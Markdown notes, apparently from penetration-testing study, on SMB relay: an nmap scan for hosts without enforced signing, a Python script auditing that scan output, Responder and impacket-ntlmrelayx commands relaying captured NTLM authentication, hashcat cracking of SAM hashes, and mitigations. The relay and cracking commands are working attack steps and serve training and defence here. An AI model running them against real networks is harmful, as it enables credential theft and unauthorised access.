# SMB Relay

## Overview

Instead of cracking the captured hashes, we can instead relay those hashes to specific machines and potentially gain access.

However, SMB signing **MUST BE DISABLED** or **NOT ENFORCED** on the target, and the relayed credentials must belong to a local administrator on that machine for the relay to be of any real value.

## Identify Hosts Without SMB Signing

```bash
nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24
```

### Desired Output

```bash
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|    3:1:1:
|_     Message signing enabled but not required
```
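The scan above only becomes useful once its output is turned into an inventory of which hosts enforce signing and which do not. The following Python script is an added example, not part of the original notes or of nmap: it parses nmap's normal output for the `smb2-security-mode` script, classifies each host as signing required, signing not required, or no result, and lists the hosts that need signing enforced first. The embedded scan text is a constructed sample (hostnames and addresses are invented); the "Message signing ..." phrases match what the NSE script prints.

```python
import re
import sys

# Constructed sample of nmap normal output for four hosts (not real scan data).
SAMPLE_OUTPUT = """\
Nmap scan report for 192.168.1.10
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for dc01.corp.local (192.168.1.20)
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 192.168.1.30
Host is up (0.0015s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing is disabled and not required!

Nmap scan report for 192.168.1.40
Host is up (0.0030s latency).

PORT    STATE SERVICE
445/tcp closed microsoft-ds
"""

# "Nmap scan report for 10.0.0.1" or "Nmap scan report for name (10.0.0.1)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?")
# "|_    Message signing enabled but not required" (with or without the "_")
SIGN_RE = re.compile(r"^\|_?\s+Message signing (?P<msg>.+)$")

REQUIRED = "required"          # signing enforced: relay is not possible
NOT_REQUIRED = "not-required"  # signing optional or off: relay is possible
NO_RESULT = "no-smb2-result"   # port closed/filtered or the script printed nothing
UNKNOWN = "unknown"            # a verdict string this parser does not recognise


def classify(msg):
    """Map the script's human-readable verdict onto the audit states above."""
    m = msg.lower()
    if "and required" in m:
        return REQUIRED
    if "not required" in m or "disabled" in m:
        return NOT_REQUIRED
    return UNKNOWN


def parse_nmap_output(text):
    """Return {ip: state} for every host in the scan output."""
    states = {}
    current = None
    for line in text.splitlines():
        host = HOST_RE.match(line)
        if host:
            current = host.group("ip")
            states[current] = NO_RESULT  # until a signing line is seen
            continue
        sign = SIGN_RE.match(line)
        if sign and current:
            states[current] = classify(sign.group("msg"))
    return states


def relay_candidates(states):
    """Hosts to fix first: SMB signing is not enforced, so relaying works against them."""
    return sorted(ip for ip, s in states.items() if s == NOT_REQUIRED)


def report(states):
    """One line per host plus a count of hosts that need signing enforced."""
    lines = ["%-16s %s" % (ip, s) for ip, s in sorted(states.items())]
    lines.append("%d host(s) need SMB signing enforced" % len(relay_candidates(states)))
    return "\n".join(lines)


if __name__ == "__main__":
    # Usage: python audit_signing.py scan.nmap   (falls back to the sample above)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_OUTPUT
    print(report(parse_nmap_output(text)))
```

Feed it the file written with `nmap -oN`; hosts that come back as `not-required` are the ones the Mitigation section's signing policy should reach first, and hosts with `no-smb2-result` should be rescanned rather than assumed safe.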

## Edit Responder Configuration File

```bash
sudo vim /etc/responder/Responder.conf

# Turn off Responder's own SMB and HTTP servers so the captured
# authentication is handed to ntlmrelayx instead of being answered locally
SMB = off
HTTP = off
```

## Responder + SMB Relay

```bash
# -I: the interface to listen on (eth0 here)
sudo responder -I eth0 -dwv

# Relay captured NTLM authentication to the hosts in targets.txt
# (the ones found above with signing not required); -smb2support is needed for SMB2 targets
impacket-ntlmrelayx -tf targets.txt -smb2support
```

## Crack SAM Hashes

```bash
# -m 1000 = NTLM (NT hash); crackme.txt holds the dumped hashes; -O uses optimized kernels
hashcat -m 1000 crackme.txt ~/rockyou.txt -O
```

## Mitigation

* Enable SMB signing on all devices
  * Pro: Completely stops the attack
  * Con: Performance issues may arise with file copies
* Disable NTLM authentication on the network
  * Pro: Completely stops the attack
  * Con: If Kerberos stops working, Windows falls back to NTLM
* Limit Domain Admin accounts to specific tasks
* Restrict local administrator accounts

